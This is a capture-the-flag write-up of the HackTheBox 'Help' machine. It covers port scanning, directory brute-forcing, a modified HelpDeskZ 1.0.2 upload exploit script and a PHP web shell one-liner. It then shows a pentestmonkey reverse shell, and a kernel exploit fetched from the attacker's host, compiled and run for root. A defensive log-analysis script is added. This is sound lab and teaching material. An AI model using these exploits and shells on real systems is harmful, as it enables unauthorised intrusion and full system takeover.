Information gathering

┌──(root@kali)-[/home/h4m5t/Desktop/HTB/Help]
└─
┌──(root@kali)-[/home/h4m5t/Desktop/HTB/Help]
└─
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-22 01:33 AEST
Nmap scan report for 10.129.230.159
Host is up (0.012s latency).
Not shown: 997 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 e5:bb:4d:9c:de:af:6b:bf:ba:8c:22:7a:d8:d7:43:28 (RSA)
|   256 d5:b0:10:50:74:86:a3:9f:c5:53:6f:3b:4a:24:61:19 (ECDSA)
|_  256 e2:1b:88:d3:76:21:d4:1e:38:15:4a:81:11:b7:99:07 (ED25519)
80/tcp   open  http    Apache httpd 2.4.18
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Did not follow redirect to http://help.htb/
3000/tcp open  http    Node.js Express framework
|_http-title: Site doesn't have a title (application/json; charset=utf-8).
Service Info: Host: 127.0.1.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.91 seconds
Directory brute-forcing
┌──(root@kali)-[/home/h4m5t/Desktop/HTB/Help]
└─

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25
Wordlist size: 220545

Output File: /home/h4m5t/Desktop/HTB/Help/reports/http_help.htb/_24-09-24_12-53-02.txt

Target: http://help.htb/

[12:53:02] Starting:
[12:53:03] 301 -  306B  - /support  ->  http://help.htb/support/
[12:53:04] 301 -  309B  - /javascript  ->  http://help.htb/javascript/
Or use gobuster:
┌──(root@kali)-[/home/h4m5t/Desktop/HTB/Help]
└─
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://help.htb
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/support              (Status: 301) [Size: 306] [--> http://help.htb/support/]
/javascript           (Status: 301) [Size: 309] [--> http://help.htb/javascript/]
Or use ffuf, showing only successful requests and both printing the scan output to the terminal and saving it to the file scan_results.txt:
ffuf -u http://help.htb/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -mc 200,301,302 | tee scan_results.txt
File upload

Among the brute-forced directories, an upload point is found:
http://help.htb/support/
Uploading a PHP shell returns a "file type not allowed" message, but the file has in fact been uploaded successfully.
┌──(root@kali)-[/home/h4m5t/Desktop/HTB/Help]
└─
------------------------------------------------ ---------------------------------
 Exploit Title                                  |  Path
------------------------------------------------ ---------------------------------
HelpDeskZ 1.0.2 - Arbitrary File Upload         | php/webapps/40300.py
HelpDeskZ < 1.0.2 - (Authenticated) SQL Injecti | php/webapps/41200.py
Helpdeskz v2.0.2 - Stored XSS                   | php/webapps/52068.txt
------------------------------------------------ ---------------------------------
Shellcodes: No Results
┌──(root@kali)-[/home/h4m5t/Desktop/HTB/Help]
└─
  Exploit: HelpDeskZ 1.0.2 - Arbitrary File Upload
      URL: https://www.exploit-db.com/exploits/40300
     Path: /usr/share/exploitdb/exploits/php/webapps/40300.py
    Codes: N/A
 Verified: False
File Type: ASCII text
Copied to: /home/h4m5t/Desktop/HTB/Help/40300.py
The exploit after cleanup and modification:
import hashlib
import requests
import datetime
import sys

print('Helpdeskz v1.0.2 - Unauthenticated shell upload exploit')

if len(sys.argv) < 2:
    print(f"Usage: {sys.argv[0]} [nameOfUploadedFile]")
    sys.exit(1)

helpdeskzBaseUrl = 'http://help.htb/support/uploads/tickets/'
fileName = sys.argv[1]

# Use the server's clock (Date response header), not the local one,
# so the timestamp matches what the application used when storing the file
r = requests.get(helpdeskzBaseUrl)
currentTime = int((datetime.datetime.strptime(r.headers['date'], '%a, %d %b %Y %H:%M:%S %Z')
                   - datetime.datetime(1970, 1, 1)).total_seconds())

# HelpDeskZ stores uploads as md5(filename + upload timestamp).php;
# walk back up to 500 seconds from the server time until a name exists
for x in range(0, 500):
    plaintext = fileName + str(currentTime - x)
    md5hash = hashlib.md5(plaintext.encode()).hexdigest()
    url = helpdeskzBaseUrl + md5hash + '.php'
    response = requests.head(url)
    if response.status_code == 200:
        print('Found!')
        print(url)
        sys.exit(0)

print('Sorry, I did not find anything')
Upload the file phpshell.php:
<?php system($_GET['cmd']); ?>
After uploading, run the exploit script; the result:
┌──(root@kali)-[/home/h4m5t/Desktop/HTB/Help]
└─
Helpdeskz v1.0.2 - Unauthenticated shell upload exploit
Found!
http://help.htb/support/uploads/tickets/13985c5cd0fa35388f56480d778564b5.php
Enter in the browser:
http://help.htb/support/uploads/tickets/13985c5cd0fa35388f56480d778564b5.php?cmd=id
Result:
uid=1000(help) gid=1000(help) groups=1000(help),4(adm),24(cdrom),30(dip),33(www-data),46(plugdev),114(lpadmin),115(sambashare)
RCE achieved.
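From the defender's side, the exploit above leaves a distinctive trace: hundreds of HEAD requests for /support/uploads/tickets/<md5>.php that 404, followed by a 200 for a .php file in a directory that should never serve PHP. The following is an added example (not from the original writeup or from HelpDeskZ) that flags both patterns in Apache access-log lines; the log lines and the 20-miss threshold are constructed for the demonstration.

```python
"""Added example: flag the upload-name brute force and PHP served from the
uploads directory in Apache combined-format access logs. Sample lines are constructed."""
import re
from collections import Counter

# Apache combined format: ip ident user [ts] "METHOD path proto" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)
UPLOAD_DIR = "/support/uploads/tickets/"

def parse_line(line):
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def analyse(lines, miss_threshold=20):
    """Return (brute_forcers, served_php): clients with >= miss_threshold 404s under
    the uploads path, and (ip, path) pairs where a .php under uploads returned 200."""
    misses = Counter()
    served_php = []
    for line in lines:
        rec = parse_line(line)
        if not rec or not rec["path"].startswith(UPLOAD_DIR):
            continue
        if rec["status"] == "404":
            misses[rec["ip"]] += 1
        elif rec["status"] == "200" and rec["path"].split("?")[0].endswith(".php"):
            served_php.append((rec["ip"], rec["path"]))
    brute_forcers = {ip: n for ip, n in misses.items() if n >= miss_threshold}
    return brute_forcers, served_php

# Constructed sample: 25 misses from one client, then the hit and a command request
SAMPLE = [
    f'10.10.14.9 - - [22/Sep/2024:01:40:{i:02d} +1000] "HEAD {UPLOAD_DIR}{i:032x}.php HTTP/1.1" 404 -'
    for i in range(25)
] + [
    f'10.10.14.9 - - [22/Sep/2024:01:40:30 +1000] "HEAD {UPLOAD_DIR}13985c5cd0fa35388f56480d778564b5.php HTTP/1.1" 200 -',
    f'10.10.14.9 - - [22/Sep/2024:01:40:45 +1000] "GET {UPLOAD_DIR}13985c5cd0fa35388f56480d778564b5.php?cmd=id HTTP/1.1" 200 150',
    '10.10.14.3 - - [22/Sep/2024:01:41:00 +1000] "GET /support/ HTTP/1.1" 200 5120',
]

if __name__ == "__main__":
    bf, php = analyse(SAMPLE)
    print("brute-force candidates:", bf)
    print("php served from uploads:", php)
```

The second check is the stronger signal: with a random, unguessable stored name and PHP execution disabled in the uploads directory, the first pattern cannot succeed and the second cannot occur at all.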
Download a more capable php-reverse-shell:
wget https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/refs/heads/master/php-reverse-shell.php
Change the IP in the PHP script to the tun0 IP address.
Start an nc listener locally:
Upload php-reverse-shell and use the exploit script:
Get the user flag:
$ cat /home/help/user.txt
2df113fbcfc65a5889ca9a2932054c9b
Tips: There are at least two exploitable vulnerabilities in HelpDeskZ 1.0.2. There's an authenticated SQL injection that will allow you to read a SHA1 hash from the database and crack it, allowing for SSH access. There's also an arbitrary file upload vulnerability that will allow you to upload a webshell and get execution that way. Either way, you end up with a shell as the same user.
Stabilising the shell

This shell is probably non-interactive and lacks full terminal features (for example, arrow keys and tab completion do not work). To stabilise it, the following commands make the shell more interactive:
In the target machine's shell, run the following to obtain a pseudo-terminal:
python -c 'import pty; pty.spawn("/bin/bash")'
If the target has Python 3, use:
python3 -c 'import pty; pty.spawn("/bin/bash")'
In most cases this is enough and there is no need to go further.
On the attacker side (the Netcat session), press Ctrl + Z to suspend the session.
Note: switch Kali's zsh to bash first! If you stay in zsh, the commands below can be chained together:
Set the terminal mode:
Then press Enter to get a more stable interactive shell.
Finally, run the following on the target machine to set up the terminal environment:
Now that you have a shell on the target machine, the next steps are:
Enumerate system information:
Enumerate privileges:
Privilege escalation:
If the current shell has limited privileges, you may want to obtain root through privilege-escalation techniques. You can check whether the system has known privilege-escalation vulnerabilities, or abuse misconfigurations (such as SUID bits or badly configured cron jobs) to escalate.
Privilege escalation

Use the LinEnum.sh privilege-escalation check script (serve it with an HTTP server on the attacking machine and download it with wget on the target):
wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
chmod +x LinEnum.sh
./LinEnum.sh | tee LinEnum-results.txt
version 0.982
Example: ./LinEnum.sh -s -k keyword -r report -e /tmp/ -t
OPTIONS:
-k Enter keyword
-e Enter export location
-t Include thorough (lengthy) tests
-s Supply current user password to check sudo perms (INSECURE)
-r Enter report name
-h Displays this help text
Note: if you need to pull the log file from the target to your local machine for analysis, on the target you can use:
python -m SimpleHTTPServer 8080
python3 -m http.server 8080
Or use uname -a to check the system version:
help@help:/$ uname -a
Linux help 4.4.0-116-generic
A matching exploit is found:
┌──(root@kali)-[/home/h4m5t/Desktop/HTB/Help]
└─
--------------------------------------------------------- ---------------------------------
 Exploit Title                                           |  Path
--------------------------------------------------------- ---------------------------------
Linux Kernel < 4.4.0-116 (Ubuntu 16.04.4) - Local Privil | linux/local/44298.c
--------------------------------------------------------- ---------------------------------
Shellcodes: No Results

┌──(root@kali)-[/home/h4m5t/Desktop/HTB/Help]
└─
  Exploit: Linux Kernel < 4.4.0-116 (Ubuntu 16.04.4) - Local Privilege Escalation
      URL: https://www.exploit-db.com/exploits/44298
     Path: /usr/share/exploitdb/exploits/linux/local/44298.c
    Codes: CVE-2017-16995
 Verified: False
File Type: C source, ASCII text
Copied to: /home/h4m5t/Desktop/HTB/Help/44298.c
Start http.server on Kali:
On the target, download the file with wget and compile it:
help@help:/tmp$ wget http://10.10.14.9:8000/44298.c
help@help:/tmp$ gcc 44298.c -o 44298
Run it; privilege escalation succeeds:
help@help:/tmp$ ./44298
task_struct = ffff88003b502a00
uidptr = ffff880037300784
spawning root shell
root@help:/tmp
e0226c44b138c223f11148228acb9517
References

https://www.youtube.com/watch?v=axxCpCTmu_k
https://0xdf.gitlab.io/2019/06/08/htb-help.html#